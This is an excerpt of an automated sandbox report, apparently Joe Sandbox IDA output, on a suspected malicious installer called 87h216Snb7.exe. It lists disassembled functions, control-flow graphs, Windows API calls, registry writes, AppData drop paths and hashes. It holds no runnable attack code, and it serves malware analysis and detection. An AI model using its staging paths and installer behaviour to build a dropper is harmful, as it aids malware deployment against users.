                                                                                                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                                                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                                                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
                                                                                                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
                                                                                                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                                                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                                                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                            • String ID: %Konstituerende176%\presatisfaction$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde$eksegeternes$lftninger\slangetmmerens
                                                                                                                                                            • API String ID: 1941528284-1733476684
                                                                                                                                                            • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                                                                                                            • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                                                                                                            • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                                                                                                            • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 640 4055c6-4055db 641 4055e1-4055f2 640->641 642 405692-405696 640->642 643 4055f4-4055f8 call 40657e 641->643 644 4055fd-405609 lstrlenW 641->644 643->644 646 405626-40562a 644->646 647 40560b-40561b lstrlenW 644->647 649 405639-40563d 646->649 650 40562c-405633 SetWindowTextW 646->650 647->642 648 40561d-405621 lstrcatW 647->648 648->646 651 405683-405685 649->651 652 40563f-405681 SendMessageW * 3 649->652 650->649 651->642 653 405687-40568a 651->653 652->651 653->642
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                                                                                                            • lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                                                                                                            • lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
                                                                                                                                                            • SetWindowTextW.USER32(matrices,matrices), ref: 00405633
                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                            • String ID: matrices
                                                                                                                                                            • API String ID: 2531174081-3449136062
                                                                                                                                                            • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                                                            • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                                                                                                            • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                                                            • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 654 4032d9-4032f0 655 4032f2 654->655 656 4032f9-403301 654->656 655->656 657 403303 656->657 658 403308-40330d 656->658 657->658 659 40331d-40332a call 4034be 658->659 660 40330f-403318 call 4034d4 658->660 664 403330-403334 659->664 665 403475 659->665 660->659 666 40333a-40335a GetTickCount call 406a90 664->666 667 40345e-403460 664->667 668 403477-403478 665->668 678 4034b4 666->678 680 403360-403368 666->680 669 403462-403465 667->669 670 4034a9-4034ad 667->670 672 4034b7-4034bb 668->672 673 403467 669->673 674 40346a-403473 call 4034be 669->674 675 40347a-403480 670->675 676 4034af 670->676 673->674 674->665 687 4034b1 674->687 681 403482 675->681 682 403485-403493 call 4034be 675->682 676->678 678->672 684 40336a 680->684 685 40336d-40337b call 4034be 680->685 681->682 682->665 691 403495-4034a1 call 4060e3 682->691 684->685 685->665 692 403381-40338a 685->692 687->678 696 4034a3-4034a6 691->696 697 40345a-40345c 691->697 695 403390-4033ad call 406ab0 692->695 700 4033b3-4033ca GetTickCount 695->700 701 403456-403458 695->701 696->670 697->668 702 403415-403417 700->702 703 4033cc-4033d4 700->703 701->668 706 403419-40341d 702->706 707 40344a-40344e 702->707 704 4033d6-4033da 703->704 705 4033dc-40340d MulDiv wsprintfW call 4055c6 703->705 704->702 704->705 712 403412 705->712 709 403432-403438 706->709 710 40341f-403424 call 4060e3 706->710 707->680 711 403454 707->711 714 40343e-403442 709->714 715 403429-40342b 710->715 711->678 712->702 714->695 716 403448 714->716 715->697 717 40342d-403430 715->717 716->678 717->714
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                            • API String ID: 551687249-2449383134
                                                                                                                                                            • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                                                            • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                                                                                                            • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                                                            • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 718 4068c5-4068e5 GetSystemDirectoryW 719 4068e7 718->719 720 4068e9-4068eb 718->720 719->720 721 4068fc-4068fe 720->721 722 4068ed-4068f6 720->722 724 4068ff-406932 wsprintfW LoadLibraryExW 721->724 722->721 723 4068f8-4068fa 722->723 723->724
                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                                                                                                            • wsprintfW.USER32 ref: 00406917
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                                                                                            • API String ID: 2200240437-1106614640
                                                                                                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                            • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                                                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                            • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 725 4024af-4024e0 call 402dcb * 2 call 402e5b 732 4024e6-4024f0 725->732 733 402c4f-402c5e 725->733 734 4024f2-4024ff call 402dcb lstrlenW 732->734 735 402503-402506 732->735 734->735 739 402508-402519 call 402da9 735->739 740 40251a-40251d 735->740 739->740 741 40252e-402542 RegSetValueExW 740->741 742 40251f-402529 call 4032d9 740->742 746 402544 741->746 747 402547-402628 RegCloseKey 741->747 742->741 746->747 747->733 750 402953-40295a 747->750 750->733
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenW.KERNEL32(lftninger\slangetmmerens,00000023,00000011,00000002), ref: 004024FA
                                                                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 0040253A
                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                                                            • String ID: lftninger\slangetmmerens
                                                                                                                                                            • API String ID: 2655323295-458217052
                                                                                                                                                            • Opcode ID: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
                                                                                                                                                            • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                                                                                                                            • Opcode Fuzzy Hash: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
                                                                                                                                                            • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 751 406060-40606c 752 40606d-4060a1 GetTickCount GetTempFileNameW 751->752 753 4060b0-4060b2 752->753 754 4060a3-4060a5 752->754 756 4060aa-4060ad 753->756 754->752 755 4060a7 754->755 755->756
                                                                                                                                                            APIs
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040607E
                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806), ref: 00406099
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                                                                            • API String ID: 1716503409-3083371207
                                                                                                                                                            • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                            • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                                                                                                            • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                            • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 840 4015e6-4015fa call 402dcb call 405ebb 845 401656-401659 840->845 846 4015fc-40160f call 405e3d 840->846 848 401688-40231b call 401423 845->848 849 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 845->849 854 401611-401614 846->854 855 401629-40162c call 405aef 846->855 864 402c4f-402c5e 848->864 849->864 866 401680-401683 849->866 854->855 860 401616-40161d call 405b0c 854->860 863 401631-401633 855->863 860->855 870 40161f-401627 call 405a95 860->870 867 401635-40163a 863->867 868 40164c-401654 863->868 866->864 871 401649 867->871 872 40163c-401647 GetFileAttributesW 867->872 868->845 868->846 870->863 871->868 872->868 872->871
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405EC9
                                                                                                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                                                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                              • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde,?,00000000,000000F0), ref: 00401672
                                                                                                                                                            Strings
                                                                                                                                                            • C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde, xrefs: 00401665
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde
                                                                                                                                                            • API String ID: 1892508949-4177089788
                                                                                                                                                            • Opcode ID: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
                                                                                                                                                            • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                                                                                                                            • Opcode Fuzzy Hash: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
                                                                                                                                                            • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                                                                                                                                            APIs
                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                            • String ID: : Completed
                                                                                                                                                            • API String ID: 3356406503-2954849223
                                                                                                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                            • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                                                                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                            • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                                                                                                            • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                                                                                                            • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                                                                                                            • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
